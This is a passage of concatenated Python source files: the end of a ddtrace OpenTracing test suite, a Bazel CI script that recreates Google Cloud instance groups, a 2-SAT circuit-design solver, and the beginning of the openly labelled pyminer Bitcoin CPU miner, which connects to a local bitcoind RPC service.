assert tracer._enabled is True
def test_no_service_name(self):
"""A service_name should be generated if one is not provided."""
tracer = Tracer()
assert tracer._service_name == "pytest"
def test_multiple_tracer_configs(self):
"""Ensure that a tracer config is a copy of the passed config."""
config = {"enabled": True}
tracer1 = Tracer(service_name="serv1", config=config)
assert tracer1._service_name == "serv1"
config["enabled"] = False
tracer2 = Tracer(service_name="serv2", config=config)
# Ensure tracer1's config was not mutated
assert tracer1._service_name == "serv1"
assert tracer1._enabled is True
assert tracer2._service_name == "serv2"
assert tracer2._enabled is False
def test_invalid_config_key(self):
"""A config with an invalid key should raise a ConfigException."""
config = {"enabeld": False}
# No debug flag should not raise an error
tracer = Tracer(service_name="mysvc", config=config)
# With debug flag should raise an error
config["debug"] = True
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(config=config)
assert "enabeld" in str(ce_info)
assert tracer is not None
# Test with multiple incorrect keys
config["setttings"] = {}
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(service_name="mysvc", config=config)
assert ["enabeld", "setttings"] in str(ce_info)
assert tracer is not None
def test_global_tags(self):
"""Global tags should be passed from the opentracer to the tracer."""
config = {
"global_tags": {
"tag1": "value1",
"tag2": 2,
},
}
tracer = Tracer(service_name="mysvc", config=config)
with tracer.start_span("myop") as span:
# global tags should be attached to generated all datadog spans
assert span._dd_span.get_tag("tag1") == "value1"
assert span._dd_span.get_metric("tag2") == 2
with tracer.start_span("myop2") as span2:
assert span2._dd_span.get_tag("tag1") == "value1"
assert span2._dd_span.get_metric("tag2") == 2
class TestTracer(object):
def test_start_span(self, ot_tracer, test_spans):
"""Start and finish a span."""
with ot_tracer.start_span("myop") as span:
pass
# span should be finished when the context manager exits
assert span.finished
spans = test_spans.get_spans()
assert len(spans) == 1
def test_start_span_references(self, ot_tracer, test_spans):
"""Start a span using references."""
with ot_tracer.start_span("one", references=[child_of()]):
pass
spans = test_spans.pop()
assert spans[0].parent_id is None
root = ot_tracer.start_active_span("root")
# create a child using a parent reference that is not the context parent
with ot_tracer.start_active_span("one"):
with ot_tracer.start_active_span("two", references=[child_of(root.span)]):
pass
root.close()
spans = test_spans.pop()
assert spans[2].parent_id is spans[0].span_id
def test_start_span_custom_start_time(self, ot_tracer):
"""Start a span with a custom start time."""
t = 100
with mock.patch("ddtrace.span.time_ns") as time:
time.return_value = 102 * 1e9
with ot_tracer.start_span("myop", start_time=t) as span:
pass
assert span._dd_span.start == t
assert span._dd_span.duration == 2
def test_start_span_with_spancontext(self, ot_tracer, test_spans):
"""Start and finish a span using a span context as the child_of
reference.
"""
with ot_tracer.start_span("myop") as span:
with ot_tracer.start_span("myop", child_of=span.context) as span2:
pass
# span should be finished when the context manager exits
assert span.finished
assert span2.finished
spans = test_spans.pop()
assert len(spans) == 2
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
def test_start_span_with_tags(self, ot_tracer):
"""Create a span with initial tags."""
tags = {"key": "value", "key2": "value2"}
with ot_tracer.start_span("myop", tags=tags) as span:
pass
assert span._dd_span.get_tag("key") == "value"
assert span._dd_span.get_tag("key2") == "value2"
def test_start_span_with_resource_name_tag(self, ot_tracer):
"""Create a span with the tag to set the resource name"""
tags = {"resource.name": "value", "key2": "value2"}
with ot_tracer.start_span("myop", tags=tags) as span:
pass
# Span resource name should be set to tag value, and should not get set as
# a tag on the underlying span.
assert span._dd_span.resource == "value"
assert span._dd_span.get_tag("resource.name") is None
# Other tags are set as normal
assert span._dd_span.get_tag("key2") == "value2"
def test_start_active_span_multi_child(self, ot_tracer, test_spans):
"""Start and finish multiple child spans.
This should ensure that child spans can be created 2 levels deep.
"""
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = test_spans.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007 + 0.005
assert spans[2].duration >= 0.005
def test_start_active_span_multi_child_siblings(self, ot_tracer, test_spans):
"""Start and finish multiple span at the same level.
This should test to ensure a parent can have multiple child spans at the
same level.
"""
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = test_spans.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007
assert spans[2].duration >= 0.005
def test_start_span_manual_child_of(self, ot_tracer, test_spans):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
root = ot_tracer.start_span("zero")
with ot_tracer.start_span("one", child_of=root):
with ot_tracer.start_span("two", child_of=root):
with ot_tracer.start_span("three", child_of=root):
pass
root.finish()
spans = test_spans.pop()
assert spans[0].parent_id is None
# ensure each child span is a child of root
assert spans[1].parent_id is root._dd_span.span_id
assert spans[2].parent_id is root._dd_span.span_id
assert spans[3].parent_id is root._dd_span.span_id
assert spans[0].trace_id == spans[1].trace_id and spans[1].trace_id == spans[2].trace_id
def test_start_span_no_active_span(self, ot_tracer, test_spans):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
with ot_tracer.start_span("one", ignore_active_span=True):
with ot_tracer.start_span("two", ignore_active_span=True):
pass
with ot_tracer.start_span("three", ignore_active_span=True):
pass
spans = test_spans.pop()
# ensure each span does not have a parent
assert spans[0].parent_id is None
assert spans[1].parent_id is None
assert spans[2].parent_id is None
# and that each span is a new trace
assert (
spans[0].trace_id != spans[1].trace_id
and spans[1].trace_id != spans[2].trace_id
and spans[0].trace_id != spans[2].trace_id
)
def test_start_active_span_child_finish_after_parent(self, ot_tracer, test_spans):
"""Start a child span and finish it after its parent."""
span1 = ot_tracer.start_active_span("one").span
span2 = ot_tracer.start_active_span("two").span
span1.finish()
time.sleep(0.005)
span2.finish()
spans = test_spans.pop()
assert len(spans) == 2
assert spans[0].parent_id is None
assert spans[1].parent_id is span1._dd_span.span_id
assert spans[1].duration > spans[0].duration
def test_start_span_multi_intertwined(self, ot_tracer, test_spans):
"""Start multiple spans at the top level intertwined.
Alternate calling between two traces.
"""
import threading
# synchronize threads with a threading event object
event = threading.Event()
def trace_one():
_id = 11
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
pass
event.set()
def trace_two():
_id = 21
event.wait()
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
pass
# the ordering should be
# t1.span1/t2.span1, t2.span2, t1.span2, t1.span3, t2.span3
t1 = threading.Thread(target=trace_one)
t2 = threading.Thread(target=trace_two)
t1.start()
t2.start()
# wait for threads to finish
t1.join()
t2.join()
spans = test_spans.pop()
# trace_one will finish before trace_two so its spans should be written
# before the spans from trace_two, let's confirm this
assert spans[0].name == "11"
assert spans[1].name == "12"
assert spans[2].name == "13"
assert spans[3].name == "21"
assert spans[4].name == "22"
assert spans[5].name == "23"
# next let's ensure that each span has the correct parent:
# trace_one
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# trace_two
assert spans[3].parent_id is None
assert spans[4].parent_id is spans[3].span_id
assert spans[5].parent_id is spans[3].span_id
# finally we should ensure that the trace_ids are reasonable
# trace_one
assert spans[0].trace_id == spans[1].trace_id and spans[1].trace_id == spans[2].trace_id
# traces should be independent
assert spans[2].trace_id != spans[3].trace_id
# trace_two
assert spans[3].trace_id == spans[4].trace_id and spans[4].trace_id == spans[5].trace_id
def test_start_active_span(self, ot_tracer, test_spans):
with ot_tracer.start_active_span("one") as scope:
pass
assert scope.span._dd_span.name == "one"
assert scope.span.finished
spans = test_spans.pop()
assert spans
def test_start_active_span_finish_on_close(self, ot_tracer, test_spans):
with ot_tracer.start_active_span("one", finish_on_close=False) as scope:
pass
assert scope.span._dd_span.name == "one"
assert not scope.span.finished
spans = test_spans.pop()
assert not spans
def test_start_active_span_nested(self, ot_tracer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
assert ot_tracer.active_span == outer_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
with ot_tracer.start_active_span("three") as innest_scope: # why isn't it innest? innermost so verbose
assert ot_tracer.active_span == innest_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
assert ot_tracer.active_span == outer_scope.span
assert ot_tracer.active_span is None
def test_start_active_span_trace(self, ot_tracer, test_spans):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
outer_scope.span.set_tag("outer", 2)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("three") as innest_scope:
innest_scope.span.set_tag("innerest", 4)
spans = test_spans.pop()
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
assert spans[3].parent_id is spans[2].span_id
def test_interleave(self, ot_tracer, test_spans):
with ot_tracer.start_active_span("ot_root_1", ignore_active_span=True):
with ddtrace.tracer.trace("dd_child"):
with ot_tracer.start_active_span("ot_child_1"):
pass
with ot_tracer.start_active_span("ot_child_2"):
pass
spans = test_spans.pop()
assert len(spans) == 4
assert spans[0].name == "ot_root_1" and spans[0].parent_id is None
assert spans[1].name == "dd_child" and spans[1].parent_id == spans[0].span_id
assert spans[2].name == "ot_child_1" and spans[2].parent_id == spans[1].span_id
assert spans[3].name == "ot_child_2" and spans[3].parent_id == spans[0].span_id
def test_active_span(self, ot_tracer, test_spans):
with ot_tracer._dd_tracer.trace("dd") as span:
assert ot_tracer.active_span is not None
assert ot_tracer.active_span._dd_span is span
@pytest.fixture
def nop_span_ctx():
return SpanContext(sampling_priority=AUTO_KEEP)
class TestTracerSpanContextPropagation(object):
"""Test the injection and extration of a span context from a tracer."""
def test_invalid_format(self, ot_tracer, nop_span_ctx):
"""An invalid format should raise an UnsupportedFormatException."""
# test inject
with pytest.raises(UnsupportedFormatException):
ot_tracer.inject(nop_span_ctx, None, {})
# test extract
with pytest.raises(UnsupportedFormatException):
ot_tracer.extract(None, {})
def test_inject_invalid_carrier(self, ot_tracer, nop_span_ctx):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.inject(nop_span_ctx, Format.HTTP_HEADERS, None)
def test_extract_invalid_carrier(self, ot_tracer):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.extract(Format.HTTP_HEADERS, None)
def test_http_headers_base(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
def test_http_headers_baggage(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_empty_propagated_context(self, ot_tracer):
"""An empty propagated context should raise a
SpanContextCorruptedException when extracted.
"""
carrier = {}
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.HTTP_HEADERS, carrier)
def test_text(self, ot_tracer):
"""extract should undo inject for http headers"""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.TEXT_MAP, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_corrupted_propagated_context(self, ot_tracer):
"""Corrupted context should raise a SpanContextCorruptedException."""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
# manually alter a key in the carrier baggage
del carrier[HTTP_HEADER_TRACE_ID]
corrupted_key = HTTP_HEADER_TRACE_ID[2:]
carrier[corrupted_key] = 123
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.TEXT_MAP, carrier)
def test_immutable_span_context(self, ot_tracer):
"""Span contexts should be immutable."""
with ot_tracer.start_span("root") as root:
ctx_before = root.context
root.set_baggage_item("test", 2)
assert ctx_before is not root.context
with ot_tracer.start_span("child") as level1:
with ot_tracer.start_span("child") as level2:
pass
assert root.context is not level1.context
assert level2.context is not level1.context
assert level2.context is not root.context
def test_inherited_baggage(self, ot_tracer):
"""Baggage should be inherited by child spans."""
with ot_tracer.start_active_span("root") as root:
# this should be passed down to the child
root.span.set_baggage_item("root", 1)
root.span.set_baggage_item("root2", 1)
with ot_tracer.start_active_span("child") as level1:
level1.span.set_baggage_item("level1", 1)
with ot_tracer.start_active_span("child") as level2:
level2.span.set_baggage_item("level2", 1)
# ensure immutability
assert level1.span.context is not root.span.context
assert level2.span.context is not level1.span.context
# level1 should have inherited the baggage of root
assert level1.span.get_baggage_item("root")
assert level1.span.get_baggage_item("root2")
# level2 should have inherited the baggage of both level1 and level2
assert level2.span.get_baggage_item("root")
assert level2.span.get_baggage_item("root2")
assert level2.span.get_baggage_item("level1")
assert level2.span.get_baggage_item("level2")
class TestTracerCompatibility(object):
"""Ensure that our opentracer produces results in the underlying datadog tracer."""
def test_required_dd_fields(self):
"""Ensure required fields needed for successful tracing are possessed
by the underlying datadog tracer.
"""
# a service name is required
tracer = Tracer("service")
with tracer.start_span("my_span") as span:
assert span._dd_span.service
def test_set_global_tracer():
"""Sanity check for set_global_tracer"""
my_tracer = Tracer("service")
set_global_tracer(my_tracer)
assert opentracing.tracer is my_tracer
assert ddtrace.tracer is my_tracer._dd_tracer
|
create_instances.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from datetime import datetime
import os
import queue
import sys
import threading
import yaml
import gcloud
WORK_QUEUE = queue.Queue()
def worker():
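    """Consume instance-group configs from WORK_QUEUE and (re)create the matching GCE instance groups."""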
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
# We take a few keys out of the config item. The rest is passed
# as-is to create_instance_template() and thus to the gcloud
# command line tool.
count = item.pop("count")
instance_group_name = item.pop("name")
project = item.pop("project")
zone = item.pop("zone", None)
region = item.pop("region", None)
health_check = item.pop("health_check", None)
initial_delay = item.pop("initial_delay", None)
if not project:
raise Exception("Invalid instance config, no project name set")
if not zone and not region:
raise Exception("Invalid instance config, either zone or region must be specified")
timestamp = datetime.now().strftime("%Y%m%dt%H%M%S")
template_name = "{}-{}".format(instance_group_name, timestamp)
if zone is not None:
if (
gcloud.delete_instance_group(
instance_group_name, project=project, zone=zone
).returncode
== 0
):
print("Deleted existing instance group: {}".format(instance_group_name))
elif region is not None:
if (
gcloud.delete_instance_group(
instance_group_name, project=project, region=region
).returncode
== 0
):
print("Deleted existing instance group: {}".format(instance_group_name))
# Create the new instance template.
gcloud.create_instance_template(template_name, project=project, **item)
print("Created instance template {}".format(template_name))
# Create instance groups with the new template.
kwargs = {
"project": project,
"base_instance_name": instance_group_name,
"size": count,
"template": template_name,
}
if zone:
kwargs["zone"] = zone
elif region:
kwargs["region"] = region
if health_check:
kwargs["health_check"] = health_check
if initial_delay:
kwargs["initial_delay"] = initial_delay
gcloud.create_instance_group(instance_group_name, **kwargs)
print("Created instance group {}".format(instance_group_name))
finally:
WORK_QUEUE.task_done()
def read_config_file():
path = os.path.join(os.getcwd(), "instances.yml")
with open(path, "rb") as fd:
content = fd.read().decode("utf-8")
return yaml.safe_load(content)
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
parser = argparse.ArgumentParser(description="Bazel CI Instance Creation")
parser.add_argument(
"names",
type=str,
nargs="*",
help="List of instance (group) names that should be created. "
'These values must correspond to "name" entries in the '
'Yaml configuration, e.g. "bk-pipeline-ubuntu1804-java8".',
)
args = parser.parse_args(argv)
config = read_config_file()
# Verify names passed on the command-line.
valid_names = [item["name"] for item in config["instance_groups"]]
for name in args.names:
if name not in valid_names:
print("Unknown instance name: {}!".format(name))
print("\nValid instance names are: {}".format(" ".join(valid_names)))
return 1
if not args.names:
parser.print_help()
print("\nValid instance names are: {}".format(" ".join(valid_names)))
return 1
# Put VM creation instructions into the work queue.
for instance in config["instance_groups"]:
if instance["name"] not in args.names:
continue
WORK_QUEUE.put({**config["default_vm"], **instance})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
circuit_design.py
|
#Uses python3
import sys
import threading
sys.setrecursionlimit(10 ** 7) # max depth of recursion
threading.stack_size(2 ** 27) # new thread will get stack of such size
class Dgraph:
"""
A class to represent a directed graph.
...
Attributes
----------
num_v : int()
Number of vertices
neg_v : int()
Negative vertex range
adj_list : dict()
Vertices and their neighbors
t_sort : list()
Vertices sorted in descending order according to their post value (topological sort)
g_rev : dict()
Graph with its edges reversed
prev : dict()
Vertex and value assigned at the beginning of the exploration
post : dict()
Vertex and value assigned at the end of the exploration
visited : dict()
Visited vertices
component : dict()
Vertex and the component to which it belongs
component_2 : dict()
Component and list of vertices that belong to it
    clock : int (initialised to 1)
Value that is assigned to each vertex in previsit and postvisit,
increases by one after each assignment
Methods
-------
previsit(self, vertex):
Assigns each vertex the current value of the clock when the exploration starts.
postvisit(self, vertex):
Assigns each vertex the current value of the clock when the exploration ends.
explore_rev(self, vertex):
Traverse each neighbor of the given vertex, reverse the edges of the graph,
and order the vertices according to their post value (topological sort).
dfs_rev(self):
Traverse each vertex of the graph.
explore(self, vertex, id_c):
Traverse each neighbor of a given vertex.
strongly_connected_components(self):
Find the strongly connected components in the graph.
    two_sat(self):
        Determine whether the 2-CNF formula is satisfiable and, if so, build a satisfying assignment.
"""
def __init__(self, adj_l, num):
"""
Constructs all the necessary attributes for a directed graph:
Parameters
----------
num_v : int()
Number of vertices
        neg_v : int()
            Most negative vertex label, equal to -num_v
adj_list : dict()
Vertices and their neighbors
t_sort : list()
Vertices sorted in descending order according to their post value (topological sort)
g_rev : dict()
Graph with its edges reversed
prev : dict()
Vertex and value assigned at the beginning of the exploration
post : dict()
Vertex and value assigned at the end of the exploration
visited : dict()
Visited vertices
component : dict()
Vertex and the component to which it belongs
component_2 : dict()
Component and list of vertices that belong to it
        clock : int()
            Counter assigned to each vertex in previsit and postvisit;
            incremented by one after each assignment
"""
self.num_v = num
self.neg_v = num * -1
self.adj_list = adj_l
self.t_sort = list()
self.g_rev = {i : list() for i in range(self.neg_v, self.num_v + 1) if i != 0}
self.prev = dict()
self.post = dict()
self.visited = dict()
self.component = dict()
self.component_2 = dict()
self.clock = 1
def previsit(self, vertex):
'''Assigns each vertex the current value of the clock when the exploration starts
and increases the clock value by one.'''
self.prev[vertex] = self.clock
self.clock += 1
def postvisit(self, vertex):
'''Assigns each vertex the current value of the clock when the exploration ends
and increases the clock value by one.'''
self.post[vertex] = self.clock
self.clock += 1
def explore_rev(self, vertex):
'''Traverse each neighbor of the given vertex, reverse the edges of the graph,
and order the vertices according to their post value.'''
self.visited[vertex] = 'visited'
self.previsit(vertex)
for neighbor in self.adj_list.get(vertex):
self.g_rev[neighbor].append(vertex)
if neighbor not in self.visited:
self.explore_rev(neighbor)
self.postvisit(vertex)
        # The current vertex finishes last, so its post value is the largest
        # seen so far; prepending keeps t_sort in descending post order.
        self.t_sort.insert(0, vertex)
def dfs_rev(self):
'''Traverse each vertex of the graph.'''
vertices = [i for i in range(self.neg_v, self.num_v + 1) if i != 0]
for vertex in vertices:
if vertex not in self.visited:
self.explore_rev(vertex)
self.visited.clear()
def explore(self, vertex, id_c):
'''Given a vertex and the id of a component, explore the neighbors
of the vertex and establish which component they belong to.'''
self.visited[vertex] = 'visited'
self.component[vertex] = id_c
        # component id -> list of vertices that belong to it
        self.component_2.setdefault(id_c, list()).append(vertex)
for neighbor in self.g_rev.get(vertex):
if neighbor not in self.visited:
self.explore(neighbor, id_c)
def strongly_connected_components(self):
'''Find the strongly connected components in the graph.'''
        self.dfs_rev() # DFS on the original graph builds the reversed graph and the finish order
        id_comp = 1
        # Walk the reversed graph in decreasing post order (t_sort)
        for vertex in self.t_sort:
if vertex not in self.visited:
self.explore(vertex, id_comp)
                # each explore() call that starts here discovers one new strongly connected component
id_comp += 1
result = self.two_sat()
if result is False:
print("UNSATISFIABLE")
else:
print("SATISFIABLE")
print(*result)
def two_sat(self):
        '''Determine whether the 2-CNF formula is satisfiable and, if so,
        derive a satisfying assignment from the strongly connected components.'''
assigned_vars = dict()
        # assigned_vars maps each literal chosen to be true to 1: a positive
        # key means the variable is true, a negative key means it is false
com_visited = dict()
for var_x in range(1, self.num_v + 1):
# if the variable and its counterpart are in the same strongly connected component
if self.component.get(var_x) == self.component.get(var_x * -1):
return False
self.t_sort = self.t_sort[::-1] # reversed topological sort
for cur_comp in self.t_sort:
com_id = self.component.get(cur_comp)
if com_id not in com_visited:
com_list = self.component_2.get(com_id)
com_visited[com_id] = 'visited'
for cur_var in com_list:
# if the variable and its counterpart do not have an assigned value
if cur_var not in assigned_vars and cur_var * -1 not in assigned_vars:
                        assigned_vars[cur_var] = 1 # set this literal to true; its negation stays unassigned
result = list(assigned_vars.keys())
return sorted(result, key=abs) # sorted by its absolute value
def main():
graph = sys.stdin.read()
data = list(map(int, graph.split()))
n_var, n_cla = data[0:2]
data = data[2:]
edges = list(zip(data[0:(2 * n_cla):2], data[1:(2 * n_cla):2]))
neg = n_var * -1
adj = {i : list() for i in range(neg, n_var + 1) if i != 0} # list of vertices and their neighbors
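    # Each clause (a OR b) becomes the two implications (NOT a -> b) and
    # (NOT b -> a); negating a literal is just flipping its sign.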
for (a, b) in edges:
adj[a * -1].append(b)
adj[b * -1].append(a)
d_graph = Dgraph(adj, n_var)
d_graph.strongly_connected_components()
threading.Thread(target=main).start()
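# Input format parsed by main(): the first two integers are the number of
# variables and the number of clauses, followed by two literals per clause.
# Small sanity check (traced by hand, not from the original source): the input
#     1 1
#     1 1
# (one variable, one clause "x1 OR x1") prints
#     SATISFIABLE
#     1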
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
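# Helper summary: bufreverse swaps the byte order inside each 32-bit word and
# wordreverse reverses the order of the words themselves; the mining loop below
# uses them to re-order the getwork data and the resulting hashes before
# comparing against the target and submitting work.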
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
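        # Midstate optimization: only the 4-byte nonce changes per iteration,
        # so the SHA-256 state over the fixed 76-byte prefix is computed once
        # here and copied for every candidate nonce below.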
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
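        # The 80-byte header occupies hex characters 0..159 of the getwork
        # data; chars 152..159 (bytes 76..79) are the nonce field replaced here.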
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9988
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
